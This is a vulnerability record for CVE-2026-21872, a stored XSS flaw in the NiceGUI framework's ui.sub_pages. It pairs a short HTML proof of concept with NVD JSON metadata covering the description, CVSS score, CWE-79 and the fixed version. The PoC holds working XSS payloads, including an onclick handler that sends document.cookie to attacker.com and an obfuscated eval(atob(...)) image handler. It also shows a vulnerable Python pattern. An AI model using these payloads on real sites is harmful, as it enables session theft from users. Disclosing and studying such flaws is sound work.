CVE-2026-21872

<!-- CVE-2026-21872 XSS PoC for NiceGUI ui.sub_pages --> <!-- This PoC demonstrates the stored XSS vulnerability in NiceGUI sub_pages --> <!-- Malicious link payload that triggers XSS when clicked --> <a href="javascript:alert(document.cookie)">Click me</a> <!-- Alternative payload using event handlers --> <a href="#" onclick="fetch('https://attacker.com/steal?c='+document.cookie)">Click here</a> <!-- NiceGUI Python exploit example --> """ from nicegui import ui # Vulnerable code pattern (affected versions 2.22.0 - 3.4.1) @ui.page('/vulnerable') def vulnerable_page(): user_input = request.args.get('link', '') with ui.sub_pages(): ui.link(user_input, '/target') # XSS here - no sanitization # This allows attackers to inject: # javascript:alert('XSS') # <img src=x onerror=alert('XSS')> """ <!-- HTML injection vector --> <img src=x onerror="eval(atob('YWxlcnQoJ1hTUycpOw=='))">

{"cve": {"id": "CVE-2026-21872", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:55.470", "lastModified": "2026-01-15T17:41:02.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the click event listener used by ui.sub_pages, combined with attacker-controlled link rendering on the page, causes XSS when the user actively clicks on the link. This issue has been patched in version 3.5.0."}, {"lang": "es", "value": "NiceGUI es un framework de interfaz de usuario (UI) basado en Python. Desde las versiones 2.22.0 hasta la 3.4.1, una implementación insegura en el oyente de eventos de clic utilizado por ui.sub_pages, combinada con la renderización de enlaces controlada por el atacante en la página, causa XSS cuando el usuario hace clic activamente en el enlace. Este problema ha sido parcheado en la versión 3.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zauberzeug:nicegui:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.22.0", "versionEndExcluding": "3.5.0", "matchCriteriaId": "37903F79-6269-4F0A-939A-36F3E3CC41B3"}]}]}], "references": [{"url": "https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/zauberzeug/nicegui/security/advisories/GHSA-m7j5-rq9j-6jj9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}